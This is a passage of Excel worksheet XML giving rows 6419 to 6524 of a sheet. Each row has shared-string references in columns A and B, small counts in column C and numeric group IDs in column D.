      <c r="D6419">
        <v>2596</v>
      </c>
    </row>
    <row r="6420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6420" t="s">
        <v>16228</v>
      </c>
      <c r="B6420" t="s">
        <v>16217</v>
      </c>
      <c r="C6420">
        <v>11</v>
      </c>
      <c r="D6420">
        <v>2596</v>
      </c>
    </row>
    <row r="6421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6421" t="s">
        <v>16231</v>
      </c>
      <c r="B6421" t="s">
        <v>16218</v>
      </c>
      <c r="C6421">
        <v>14</v>
      </c>
      <c r="D6421">
        <v>2596</v>
      </c>
    </row>
    <row r="6422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6422" t="s">
        <v>16229</v>
      </c>
      <c r="B6422" t="s">
        <v>16219</v>
      </c>
      <c r="C6422">
        <v>0</v>
      </c>
      <c r="D6422">
        <v>2596</v>
      </c>
    </row>
    <row r="6423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6423" t="s">
        <v>16230</v>
      </c>
      <c r="B6423" t="s">
        <v>16220</v>
      </c>
      <c r="C6423">
        <v>1</v>
      </c>
      <c r="D6423">
        <v>2596</v>
      </c>
    </row>
    <row r="6424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6424" t="s">
        <v>16229</v>
      </c>
      <c r="B6424" t="s">
        <v>16221</v>
      </c>
      <c r="C6424">
        <v>4</v>
      </c>
      <c r="D6424">
        <v>2596</v>
      </c>
    </row>
    <row r="6425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6425" t="s">
        <v>16230</v>
      </c>
      <c r="B6425" t="s">
        <v>16222</v>
      </c>
      <c r="C6425">
        <v>24</v>
      </c>
      <c r="D6425">
        <v>2596</v>
      </c>
    </row>
    <row r="6426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6426" t="s">
        <v>16223</v>
      </c>
      <c r="B6426" t="s">
        <v>16223</v>
      </c>
      <c r="C6426">
        <v>26</v>
      </c>
      <c r="D6426">
        <v>2596</v>
      </c>
    </row>
    <row r="6427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6427" t="s">
        <v>16224</v>
      </c>
      <c r="B6427" t="s">
        <v>16224</v>
      </c>
      <c r="C6427">
        <v>1</v>
      </c>
      <c r="D6427">
        <v>2596</v>
      </c>
    </row>
    <row r="6428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6428" t="s">
        <v>16228</v>
      </c>
      <c r="B6428" t="s">
        <v>16211</v>
      </c>
      <c r="C6428">
        <v>0</v>
      </c>
      <c r="D6428">
        <v>2798</v>
      </c>
    </row>
    <row r="6429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6429" t="s">
        <v>16231</v>
      </c>
      <c r="B6429" t="s">
        <v>16212</v>
      </c>
      <c r="C6429">
        <v>0</v>
      </c>
      <c r="D6429">
        <v>2798</v>
      </c>
    </row>
    <row r="6430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6430" t="s">
        <v>16228</v>
      </c>
      <c r="B6430" t="s">
        <v>16213</v>
      </c>
      <c r="C6430">
        <v>0</v>
      </c>
      <c r="D6430">
        <v>2798</v>
      </c>
    </row>
    <row r="6431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6431" t="s">
        <v>16231</v>
      </c>
      <c r="B6431" t="s">
        <v>16214</v>
      </c>
      <c r="C6431">
        <v>0</v>
      </c>
      <c r="D6431">
        <v>2798</v>
      </c>
    </row>
    <row r="6432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6432" t="s">
        <v>16228</v>
      </c>
      <c r="B6432" t="s">
        <v>16215</v>
      </c>
      <c r="C6432">
        <v>0</v>
      </c>
      <c r="D6432">
        <v>2798</v>
      </c>
    </row>
    <row r="6433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6433" t="s">
        <v>16231</v>
      </c>
      <c r="B6433" t="s">
        <v>16216</v>
      </c>
      <c r="C6433">
        <v>5</v>
      </c>
      <c r="D6433">
        <v>2798</v>
      </c>
    </row>
    <row r="6434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6434" t="s">
        <v>16228</v>
      </c>
      <c r="B6434" t="s">
        <v>16217</v>
      </c>
      <c r="C6434">
        <v>20</v>
      </c>
      <c r="D6434">
        <v>2798</v>
      </c>
    </row>
    <row r="6435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6435" t="s">
        <v>16231</v>
      </c>
      <c r="B6435" t="s">
        <v>16218</v>
      </c>
      <c r="C6435">
        <v>10</v>
      </c>
      <c r="D6435">
        <v>2798</v>
      </c>
    </row>
    <row r="6436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6436" t="s">
        <v>16229</v>
      </c>
      <c r="B6436" t="s">
        <v>16219</v>
      </c>
      <c r="C6436">
        <v>0</v>
      </c>
      <c r="D6436">
        <v>2798</v>
      </c>
    </row>
    <row r="6437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6437" t="s">
        <v>16230</v>
      </c>
      <c r="B6437" t="s">
        <v>16220</v>
      </c>
      <c r="C6437">
        <v>5</v>
      </c>
      <c r="D6437">
        <v>2798</v>
      </c>
    </row>
    <row r="6438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6438" t="s">
        <v>16229</v>
      </c>
      <c r="B6438" t="s">
        <v>16221</v>
      </c>
      <c r="C6438">
        <v>30</v>
      </c>
      <c r="D6438">
        <v>2798</v>
      </c>
    </row>
    <row r="6439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6439" t="s">
        <v>16230</v>
      </c>
      <c r="B6439" t="s">
        <v>16222</v>
      </c>
      <c r="C6439">
        <v>100</v>
      </c>
      <c r="D6439">
        <v>2798</v>
      </c>
    </row>
    <row r="6440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6440" t="s">
        <v>16223</v>
      </c>
      <c r="B6440" t="s">
        <v>16223</v>
      </c>
      <c r="C6440">
        <v>26</v>
      </c>
      <c r="D6440">
        <v>2798</v>
      </c>
    </row>
    <row r="6441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6441" t="s">
        <v>16224</v>
      </c>
      <c r="B6441" t="s">
        <v>16224</v>
      </c>
      <c r="C6441">
        <v>1</v>
      </c>
      <c r="D6441">
        <v>2798</v>
      </c>
    </row>
    <row r="6442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6442" t="s">
        <v>16228</v>
      </c>
      <c r="B6442" t="s">
        <v>16211</v>
      </c>
      <c r="C6442">
        <v>0</v>
      </c>
      <c r="D6442">
        <v>2698</v>
      </c>
    </row>
    <row r="6443" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6443" t="s">
        <v>16231</v>
      </c>
      <c r="B6443" t="s">
        <v>16212</v>
      </c>
      <c r="C6443">
        <v>0</v>
      </c>
      <c r="D6443">
        <v>2698</v>
      </c>
    </row>
    <row r="6444" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6444" t="s">
        <v>16228</v>
      </c>
      <c r="B6444" t="s">
        <v>16213</v>
      </c>
      <c r="C6444">
        <v>0</v>
      </c>
      <c r="D6444">
        <v>2698</v>
      </c>
    </row>
    <row r="6445" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6445" t="s">
        <v>16231</v>
      </c>
      <c r="B6445" t="s">
        <v>16214</v>
      </c>
      <c r="C6445">
        <v>0</v>
      </c>
      <c r="D6445">
        <v>2698</v>
      </c>
    </row>
    <row r="6446" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6446" t="s">
        <v>16228</v>
      </c>
      <c r="B6446" t="s">
        <v>16215</v>
      </c>
      <c r="C6446">
        <v>3</v>
      </c>
      <c r="D6446">
        <v>2698</v>
      </c>
    </row>
    <row r="6447" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6447" t="s">
        <v>16231</v>
      </c>
      <c r="B6447" t="s">
        <v>16216</v>
      </c>
      <c r="C6447">
        <v>2</v>
      </c>
      <c r="D6447">
        <v>2698</v>
      </c>
    </row>
    <row r="6448" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6448" t="s">
        <v>16228</v>
      </c>
      <c r="B6448" t="s">
        <v>16217</v>
      </c>
      <c r="C6448">
        <v>0</v>
      </c>
      <c r="D6448">
        <v>2698</v>
      </c>
    </row>
    <row r="6449" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6449" t="s">
        <v>16231</v>
      </c>
      <c r="B6449" t="s">
        <v>16218</v>
      </c>
      <c r="C6449">
        <v>0</v>
      </c>
      <c r="D6449">
        <v>2698</v>
      </c>
    </row>
    <row r="6450" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6450" t="s">
        <v>16229</v>
      </c>
      <c r="B6450" t="s">
        <v>16219</v>
      </c>
      <c r="C6450">
        <v>50</v>
      </c>
      <c r="D6450">
        <v>2698</v>
      </c>
    </row>
    <row r="6451" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6451" t="s">
        <v>16230</v>
      </c>
      <c r="B6451" t="s">
        <v>16220</v>
      </c>
      <c r="C6451">
        <v>18</v>
      </c>
      <c r="D6451">
        <v>2698</v>
      </c>
    </row>
    <row r="6452" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6452" t="s">
        <v>16229</v>
      </c>
      <c r="B6452" t="s">
        <v>16221</v>
      </c>
      <c r="C6452">
        <v>0</v>
      </c>
      <c r="D6452">
        <v>2698</v>
      </c>
    </row>
    <row r="6453" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6453" t="s">
        <v>16230</v>
      </c>
      <c r="B6453" t="s">
        <v>16222</v>
      </c>
      <c r="C6453">
        <v>0</v>
      </c>
      <c r="D6453">
        <v>2698</v>
      </c>
    </row>
    <row r="6454" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6454" t="s">
        <v>16223</v>
      </c>
      <c r="B6454" t="s">
        <v>16223</v>
      </c>
      <c r="C6454">
        <v>5</v>
      </c>
      <c r="D6454">
        <v>2698</v>
      </c>
    </row>
    <row r="6455" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6455" t="s">
        <v>16224</v>
      </c>
      <c r="B6455" t="s">
        <v>16224</v>
      </c>
      <c r="C6455">
        <v>1</v>
      </c>
      <c r="D6455">
        <v>2698</v>
      </c>
    </row>
    <row r="6456" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6456" t="s">
        <v>16228</v>
      </c>
      <c r="B6456" t="s">
        <v>16215</v>
      </c>
      <c r="C6456">
        <v>0</v>
      </c>
      <c r="D6456">
        <v>420</v>
      </c>
    </row>
    <row r="6457" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6457" t="s">
        <v>16231</v>
      </c>
      <c r="B6457" t="s">
        <v>16216</v>
      </c>
      <c r="C6457">
        <v>3</v>
      </c>
      <c r="D6457">
        <v>420</v>
      </c>
    </row>
    <row r="6458" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6458" t="s">
        <v>16228</v>
      </c>
      <c r="B6458" t="s">
        <v>16217</v>
      </c>
      <c r="C6458">
        <v>4</v>
      </c>
      <c r="D6458">
        <v>420</v>
      </c>
    </row>
    <row r="6459" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6459" t="s">
        <v>16231</v>
      </c>
      <c r="B6459" t="s">
        <v>16218</v>
      </c>
      <c r="C6459">
        <v>2</v>
      </c>
      <c r="D6459">
        <v>420</v>
      </c>
    </row>
    <row r="6460" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6460" t="s">
        <v>16229</v>
      </c>
      <c r="B6460" t="s">
        <v>16221</v>
      </c>
      <c r="C6460">
        <v>20</v>
      </c>
      <c r="D6460">
        <v>420</v>
      </c>
    </row>
    <row r="6461" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6461" t="s">
        <v>16230</v>
      </c>
      <c r="B6461" t="s">
        <v>16222</v>
      </c>
      <c r="C6461">
        <v>3</v>
      </c>
      <c r="D6461">
        <v>420</v>
      </c>
    </row>
    <row r="6462" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6462" t="s">
        <v>16223</v>
      </c>
      <c r="B6462" t="s">
        <v>16223</v>
      </c>
      <c r="C6462">
        <v>25</v>
      </c>
      <c r="D6462">
        <v>420</v>
      </c>
    </row>
    <row r="6463" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6463" t="s">
        <v>16228</v>
      </c>
      <c r="B6463" t="s">
        <v>16211</v>
      </c>
      <c r="C6463">
        <v>0</v>
      </c>
      <c r="D6463">
        <v>586</v>
      </c>
    </row>
    <row r="6464" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6464" t="s">
        <v>16231</v>
      </c>
      <c r="B6464" t="s">
        <v>16212</v>
      </c>
      <c r="C6464">
        <v>0</v>
      </c>
      <c r="D6464">
        <v>586</v>
      </c>
    </row>
    <row r="6465" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6465" t="s">
        <v>16228</v>
      </c>
      <c r="B6465" t="s">
        <v>16213</v>
      </c>
      <c r="C6465">
        <v>0</v>
      </c>
      <c r="D6465">
        <v>586</v>
      </c>
    </row>
    <row r="6466" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6466" t="s">
        <v>16231</v>
      </c>
      <c r="B6466" t="s">
        <v>16214</v>
      </c>
      <c r="C6466">
        <v>0</v>
      </c>
      <c r="D6466">
        <v>586</v>
      </c>
    </row>
    <row r="6467" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6467" t="s">
        <v>16228</v>
      </c>
      <c r="B6467" t="s">
        <v>16215</v>
      </c>
      <c r="C6467">
        <v>1</v>
      </c>
      <c r="D6467">
        <v>586</v>
      </c>
    </row>
    <row r="6468" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6468" t="s">
        <v>16231</v>
      </c>
      <c r="B6468" t="s">
        <v>16216</v>
      </c>
      <c r="C6468">
        <v>1</v>
      </c>
      <c r="D6468">
        <v>586</v>
      </c>
    </row>
    <row r="6469" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6469" t="s">
        <v>16228</v>
      </c>
      <c r="B6469" t="s">
        <v>16217</v>
      </c>
      <c r="C6469">
        <v>0</v>
      </c>
      <c r="D6469">
        <v>586</v>
      </c>
    </row>
    <row r="6470" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6470" t="s">
        <v>16231</v>
      </c>
      <c r="B6470" t="s">
        <v>16218</v>
      </c>
      <c r="C6470">
        <v>0</v>
      </c>
      <c r="D6470">
        <v>586</v>
      </c>
    </row>
    <row r="6471" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6471" t="s">
        <v>16229</v>
      </c>
      <c r="B6471" t="s">
        <v>16219</v>
      </c>
      <c r="C6471">
        <v>0</v>
      </c>
      <c r="D6471">
        <v>586</v>
      </c>
    </row>
    <row r="6472" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6472" t="s">
        <v>16230</v>
      </c>
      <c r="B6472" t="s">
        <v>16220</v>
      </c>
      <c r="C6472">
        <v>0</v>
      </c>
      <c r="D6472">
        <v>586</v>
      </c>
    </row>
    <row r="6473" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6473" t="s">
        <v>16229</v>
      </c>
      <c r="B6473" t="s">
        <v>16221</v>
      </c>
      <c r="C6473">
        <v>3</v>
      </c>
      <c r="D6473">
        <v>586</v>
      </c>
    </row>
    <row r="6474" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6474" t="s">
        <v>16230</v>
      </c>
      <c r="B6474" t="s">
        <v>16222</v>
      </c>
      <c r="C6474">
        <v>5</v>
      </c>
      <c r="D6474">
        <v>586</v>
      </c>
    </row>
    <row r="6475" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6475" t="s">
        <v>16223</v>
      </c>
      <c r="B6475" t="s">
        <v>16223</v>
      </c>
      <c r="C6475">
        <v>5</v>
      </c>
      <c r="D6475">
        <v>586</v>
      </c>
    </row>
    <row r="6476" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6476" t="s">
        <v>16224</v>
      </c>
      <c r="B6476" t="s">
        <v>16224</v>
      </c>
      <c r="C6476">
        <v>1</v>
      </c>
      <c r="D6476">
        <v>586</v>
      </c>
    </row>
    <row r="6477" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6477" t="s">
        <v>16228</v>
      </c>
      <c r="B6477" t="s">
        <v>16211</v>
      </c>
      <c r="C6477">
        <v>0</v>
      </c>
      <c r="D6477">
        <v>272</v>
      </c>
    </row>
    <row r="6478" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6478" t="s">
        <v>16231</v>
      </c>
      <c r="B6478" t="s">
        <v>16212</v>
      </c>
      <c r="C6478">
        <v>0</v>
      </c>
      <c r="D6478">
        <v>272</v>
      </c>
    </row>
    <row r="6479" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6479" t="s">
        <v>16228</v>
      </c>
      <c r="B6479" t="s">
        <v>16213</v>
      </c>
      <c r="C6479">
        <v>0</v>
      </c>
      <c r="D6479">
        <v>272</v>
      </c>
    </row>
    <row r="6480" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6480" t="s">
        <v>16231</v>
      </c>
      <c r="B6480" t="s">
        <v>16214</v>
      </c>
      <c r="C6480">
        <v>0</v>
      </c>
      <c r="D6480">
        <v>272</v>
      </c>
    </row>
    <row r="6481" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6481" t="s">
        <v>16228</v>
      </c>
      <c r="B6481" t="s">
        <v>16215</v>
      </c>
      <c r="C6481">
        <v>50</v>
      </c>
      <c r="D6481">
        <v>272</v>
      </c>
    </row>
    <row r="6482" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6482" t="s">
        <v>16231</v>
      </c>
      <c r="B6482" t="s">
        <v>16216</v>
      </c>
      <c r="C6482">
        <v>40</v>
      </c>
      <c r="D6482">
        <v>272</v>
      </c>
    </row>
    <row r="6483" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6483" t="s">
        <v>16228</v>
      </c>
      <c r="B6483" t="s">
        <v>16217</v>
      </c>
      <c r="C6483">
        <v>30</v>
      </c>
      <c r="D6483">
        <v>272</v>
      </c>
    </row>
    <row r="6484" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6484" t="s">
        <v>16231</v>
      </c>
      <c r="B6484" t="s">
        <v>16218</v>
      </c>
      <c r="C6484">
        <v>70</v>
      </c>
      <c r="D6484">
        <v>272</v>
      </c>
    </row>
    <row r="6485" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6485" t="s">
        <v>16229</v>
      </c>
      <c r="B6485" t="s">
        <v>16219</v>
      </c>
      <c r="C6485">
        <v>0</v>
      </c>
      <c r="D6485">
        <v>272</v>
      </c>
    </row>
    <row r="6486" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6486" t="s">
        <v>16230</v>
      </c>
      <c r="B6486" t="s">
        <v>16220</v>
      </c>
      <c r="C6486">
        <v>0</v>
      </c>
      <c r="D6486">
        <v>272</v>
      </c>
    </row>
    <row r="6487" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6487" t="s">
        <v>16229</v>
      </c>
      <c r="B6487" t="s">
        <v>16221</v>
      </c>
      <c r="C6487">
        <v>0</v>
      </c>
      <c r="D6487">
        <v>272</v>
      </c>
    </row>
    <row r="6488" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6488" t="s">
        <v>16230</v>
      </c>
      <c r="B6488" t="s">
        <v>16222</v>
      </c>
      <c r="C6488">
        <v>0</v>
      </c>
      <c r="D6488">
        <v>272</v>
      </c>
    </row>
    <row r="6489" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6489" t="s">
        <v>16223</v>
      </c>
      <c r="B6489" t="s">
        <v>16223</v>
      </c>
      <c r="C6489">
        <v>23</v>
      </c>
      <c r="D6489">
        <v>272</v>
      </c>
    </row>
    <row r="6490" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6490" t="s">
        <v>16224</v>
      </c>
      <c r="B6490" t="s">
        <v>16224</v>
      </c>
      <c r="C6490">
        <v>2</v>
      </c>
      <c r="D6490">
        <v>272</v>
      </c>
    </row>
    <row r="6491" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6491" t="s">
        <v>16228</v>
      </c>
      <c r="B6491" t="s">
        <v>16215</v>
      </c>
      <c r="C6491">
        <v>0</v>
      </c>
      <c r="D6491">
        <v>272</v>
      </c>
    </row>
    <row r="6492" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6492" t="s">
        <v>16231</v>
      </c>
      <c r="B6492" t="s">
        <v>16216</v>
      </c>
      <c r="C6492">
        <v>0</v>
      </c>
      <c r="D6492">
        <v>272</v>
      </c>
    </row>
    <row r="6493" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6493" t="s">
        <v>16228</v>
      </c>
      <c r="B6493" t="s">
        <v>16217</v>
      </c>
      <c r="C6493">
        <v>0</v>
      </c>
      <c r="D6493">
        <v>272</v>
      </c>
    </row>
    <row r="6494" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6494" t="s">
        <v>16231</v>
      </c>
      <c r="B6494" t="s">
        <v>16218</v>
      </c>
      <c r="C6494">
        <v>0</v>
      </c>
      <c r="D6494">
        <v>272</v>
      </c>
    </row>
    <row r="6495" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6495" t="s">
        <v>16223</v>
      </c>
      <c r="B6495" t="s">
        <v>16223</v>
      </c>
      <c r="C6495">
        <v>0</v>
      </c>
      <c r="D6495">
        <v>272</v>
      </c>
    </row>
    <row r="6496" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6496" t="s">
        <v>16224</v>
      </c>
      <c r="B6496" t="s">
        <v>16224</v>
      </c>
      <c r="C6496">
        <v>0</v>
      </c>
      <c r="D6496">
        <v>272</v>
      </c>
    </row>
    <row r="6497" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6497" t="s">
        <v>16228</v>
      </c>
      <c r="B6497" t="s">
        <v>16215</v>
      </c>
      <c r="C6497">
        <v>2</v>
      </c>
      <c r="D6497">
        <v>2698</v>
      </c>
    </row>
    <row r="6498" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6498" t="s">
        <v>16231</v>
      </c>
      <c r="B6498" t="s">
        <v>16216</v>
      </c>
      <c r="C6498">
        <v>3</v>
      </c>
      <c r="D6498">
        <v>2698</v>
      </c>
    </row>
    <row r="6499" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6499" t="s">
        <v>16228</v>
      </c>
      <c r="B6499" t="s">
        <v>16211</v>
      </c>
      <c r="C6499">
        <v>0</v>
      </c>
      <c r="D6499">
        <v>671</v>
      </c>
    </row>
    <row r="6500" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6500" t="s">
        <v>16231</v>
      </c>
      <c r="B6500" t="s">
        <v>16212</v>
      </c>
      <c r="C6500">
        <v>0</v>
      </c>
      <c r="D6500">
        <v>671</v>
      </c>
    </row>
    <row r="6501" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6501" t="s">
        <v>16228</v>
      </c>
      <c r="B6501" t="s">
        <v>16213</v>
      </c>
      <c r="C6501">
        <v>0</v>
      </c>
      <c r="D6501">
        <v>671</v>
      </c>
    </row>
    <row r="6502" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6502" t="s">
        <v>16231</v>
      </c>
      <c r="B6502" t="s">
        <v>16214</v>
      </c>
      <c r="C6502">
        <v>0</v>
      </c>
      <c r="D6502">
        <v>671</v>
      </c>
    </row>
    <row r="6503" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6503" t="s">
        <v>16228</v>
      </c>
      <c r="B6503" t="s">
        <v>16215</v>
      </c>
      <c r="C6503">
        <v>1</v>
      </c>
      <c r="D6503">
        <v>671</v>
      </c>
    </row>
    <row r="6504" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6504" t="s">
        <v>16231</v>
      </c>
      <c r="B6504" t="s">
        <v>16216</v>
      </c>
      <c r="C6504">
        <v>1</v>
      </c>
      <c r="D6504">
        <v>671</v>
      </c>
    </row>
    <row r="6505" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6505" t="s">
        <v>16228</v>
      </c>
      <c r="B6505" t="s">
        <v>16217</v>
      </c>
      <c r="C6505">
        <v>9</v>
      </c>
      <c r="D6505">
        <v>671</v>
      </c>
    </row>
    <row r="6506" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6506" t="s">
        <v>16231</v>
      </c>
      <c r="B6506" t="s">
        <v>16218</v>
      </c>
      <c r="C6506">
        <v>8</v>
      </c>
      <c r="D6506">
        <v>671</v>
      </c>
    </row>
    <row r="6507" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6507" t="s">
        <v>16229</v>
      </c>
      <c r="B6507" t="s">
        <v>16219</v>
      </c>
      <c r="C6507">
        <v>2</v>
      </c>
      <c r="D6507">
        <v>671</v>
      </c>
    </row>
    <row r="6508" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6508" t="s">
        <v>16230</v>
      </c>
      <c r="B6508" t="s">
        <v>16220</v>
      </c>
      <c r="C6508">
        <v>2</v>
      </c>
      <c r="D6508">
        <v>671</v>
      </c>
    </row>
    <row r="6509" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6509" t="s">
        <v>16229</v>
      </c>
      <c r="B6509" t="s">
        <v>16221</v>
      </c>
      <c r="C6509">
        <v>21</v>
      </c>
      <c r="D6509">
        <v>671</v>
      </c>
    </row>
    <row r="6510" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6510" t="s">
        <v>16230</v>
      </c>
      <c r="B6510" t="s">
        <v>16222</v>
      </c>
      <c r="C6510">
        <v>44</v>
      </c>
      <c r="D6510">
        <v>671</v>
      </c>
    </row>
    <row r="6511" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6511" t="s">
        <v>16223</v>
      </c>
      <c r="B6511" t="s">
        <v>16223</v>
      </c>
      <c r="C6511">
        <v>25</v>
      </c>
      <c r="D6511">
        <v>671</v>
      </c>
    </row>
    <row r="6512" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6512" t="s">
        <v>16224</v>
      </c>
      <c r="B6512" t="s">
        <v>16224</v>
      </c>
      <c r="C6512">
        <v>1</v>
      </c>
      <c r="D6512">
        <v>671</v>
      </c>
    </row>
    <row r="6513" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6513" t="s">
        <v>16231</v>
      </c>
      <c r="B6513" t="s">
        <v>16216</v>
      </c>
      <c r="C6513">
        <v>10</v>
      </c>
      <c r="D6513">
        <v>2698</v>
      </c>
    </row>
    <row r="6514" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6514" t="s">
        <v>16228</v>
      </c>
      <c r="B6514" t="s">
        <v>16217</v>
      </c>
      <c r="C6514">
        <v>20</v>
      </c>
      <c r="D6514">
        <v>2698</v>
      </c>
    </row>
    <row r="6515" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6515" t="s">
        <v>16231</v>
      </c>
      <c r="B6515" t="s">
        <v>16218</v>
      </c>
      <c r="C6515">
        <v>35</v>
      </c>
      <c r="D6515">
        <v>2698</v>
      </c>
    </row>
    <row r="6516" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6516" t="s">
        <v>16229</v>
      </c>
      <c r="B6516" t="s">
        <v>16219</v>
      </c>
      <c r="C6516">
        <v>0</v>
      </c>
      <c r="D6516">
        <v>2698</v>
      </c>
    </row>
    <row r="6517" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6517" t="s">
        <v>16230</v>
      </c>
      <c r="B6517" t="s">
        <v>16220</v>
      </c>
      <c r="C6517">
        <v>0</v>
      </c>
      <c r="D6517">
        <v>2698</v>
      </c>
    </row>
    <row r="6518" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6518" t="s">
        <v>16228</v>
      </c>
      <c r="B6518" t="s">
        <v>16211</v>
      </c>
      <c r="C6518">
        <v>0</v>
      </c>
      <c r="D6518">
        <v>2811</v>
      </c>
    </row>
    <row r="6519" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6519" t="s">
        <v>16231</v>
      </c>
      <c r="B6519" t="s">
        <v>16212</v>
      </c>
      <c r="C6519">
        <v>0</v>
      </c>
      <c r="D6519">
        <v>2811</v>
      </c>
    </row>
    <row r="6520" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6520" t="s">
        <v>16228</v>
      </c>
      <c r="B6520" t="s">
        <v>16213</v>
      </c>
      <c r="C6520">
        <v>0</v>
      </c>
      <c r="D6520">
        <v>2811</v>
      </c>
    </row>
    <row r="6521" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6521" t="s">
        <v>16231</v>
      </c>
      <c r="B6521" t="s">
        <v>16214</v>
      </c>
      <c r="C6521">
        <v>0</v>
      </c>
      <c r="D6521">
        <v>2811</v>
      </c>
    </row>
    <row r="6522" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6522" t="s">
        <v>16228</v>
      </c>
      <c r="B6522" t="s">
        <v>16215</v>
      </c>
      <c r="C6522">
        <v>0</v>
      </c>
      <c r="D6522">
        <v>2811</v>
      </c>
    </row>
    <row r="6523" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6523" t="s">
        <v>16231</v>
      </c>
      <c r="B6523" t="s">
        <v>16216</v>
      </c>
      <c r="C6523">
        <v>2</v>
      </c>
      <c r="D6523">
        <v>2811</v>
      </c>
    </row>
    <row r="6524" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6524" t="s">
        <v>16228</v>
      </c>
      <c r="B6524" t="s">
        <v>16217</v>
      </c>
      <c r="C6524">
        <v>10</v>
      </c>
      <c r="D6524">
        <v>2811</v>
      </c>
    </row>
